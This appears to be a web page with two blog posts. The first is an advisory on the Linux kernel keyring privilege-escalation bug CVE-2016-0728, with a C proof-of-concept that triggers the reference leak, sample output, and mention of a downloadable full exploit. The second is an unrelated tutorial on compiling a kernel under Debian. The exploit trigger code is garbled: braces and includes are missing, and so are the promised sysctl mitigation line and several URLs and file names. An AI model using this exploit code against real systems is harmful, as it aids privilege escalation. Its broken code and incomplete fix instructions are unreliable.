New Linux Kernel Zero day Exploit Vulnerability CVE-2016-0728

New Linux Kernel Zero day Exploit Vulnerability CVE-2016-0728

The PPR research team recently found a 0-day local privillege escalation vulnerability in the linux kernel. This vulnerability has existed since 2012. This bug is cased buy a reference leak in the keyrings facility.

We already performed mitigation procedures in our proactive clients servers. If you don’t have a proactive management plan, please contact us asap

How to test My Kernel?

You can use the following C code to test it.

/* $ gcc leak.c -o leak -lkeyutils -Wall */
/* $ ./leak */
/* $ cat /proc/keys */


int main(int argc, const char *argv[])
    int i = 0;
    key_serial_t serial;

    serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, "leaked-keyring");
    if (serial < 0) {
        return -1;

    if (keyctl(KEYCTL_SETPERM, serial, KEY_POS_ALL | KEY_USR_ALL) < 0) {
        return -1;

    for (i = 0; i < 100; i++) {
        serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, "leaked-keyring");
        if (serial < 0) {
            return -1;

    return 0;

It will a sample output like as follows,

@ohome:~$ gcc leak.c -o leak -lkeyutils -Wall
@ohome:~$ cat /proc/keys
@ohome:~$ ./leak
@ohome:~$ cat /proc/keys
3fa2af76 I--Q--- 100 perm 3f3f0000 1000 1000 keyring leaked-keyring: empty

You can download the a full exploit from here. It will take around 30 to 40 minutes to finish the forking. Well as you know time is not an issue in privillege excalation exploit.


This was affected by almost all kernel version(3.x + ) Initially disable the following in sysctl.conf


After that upgrade your kernel version. There may be already a patch for the kernel in your OS.


1. PPR Research Page

How to compile linux kernel in Debian / Ubuntu the Easy Way

Sometimes you may need to compile  for enabling a  specific module in Linux. It is easy to compile and update the linux kernel to latest stable version  for your computer or server.  At the time of  writing  of this article the latest stable version of linux kernel is  3.12. So in this article , I show you how to compile the latest kernel in debian.

First of all you need to download and  install a set of  building tools that required to compile the linux kernel in your  desktop.

1 . In stall all the  build essentials for your  compilation process,
apt-get update

apt-get install kernel-package libncurses5-dev fakeroot wget bzip2 build-essential

2. Download the latest stable kernel form and extract  it
cd /usr/src
wget -c
tar -xJf  linux-3.12.tar.xz
cd linux-3.12
3.The easy way of configuring the kernel

Before compiling  the kernel we have to configure the option. That  means we have to enable all required modules  using the command “make menuconfig ” . This article title says , it is an easy way. So let us copy the older configuration if your current kernel into the “.config” file which is the configuration file for kernel build

root@myhome:/usr/src/linux-3.12#  cp -v /boot/config-`uname -r` ./.config
4. Adding your extra kernel modules

Now run the following command and  load this .config file form the “load” table

make menuconfig

After loading the .config file old option , you can  add or remove any additional kernel modules as  you wish

5. Now build the kernel package

you may need to use the following commands from your debian shell

# make-kpkg clean
# fakeroot make-kpkg -j4 --initrd --append-to-version=-new kernel_image kernel_headers

The option “-j4” will multi thread your compilation process  between 4 cpu cores and increase the compilation time .  Also the option –append-to-version=-new add a tag “new”  to the kernel .  The kernel compilation will take 3o to 45 minutes depend on the options you selected in the make menuconfig .

6. After Finishing the compil

You may look into the directory /usr/src for seeing two debian packages named  like  as follows,


Install these packages as follows,

dpkg -i linux-headers-3.12.0-new_3.12.0-new-10.00.Custom_amd64.deb
dpkg -i linux-image-3.12.0-new_3.12.0-new-10.00.Custom_amd64.deb
7. Updating the grub

You may now update the  grub configuration using the following command

# update-grub

If you like to change the boot options please make sure to edit it in  /etc/default/grub  and update the grub after that. In  debian and ubuntu this toll will automatically propagate the grub configuration. If you are  compiling  it in a remote server, please make sure to set automatic PANIC options and reboot options in grub for a crash recovery too. After that reboot  into new kernel.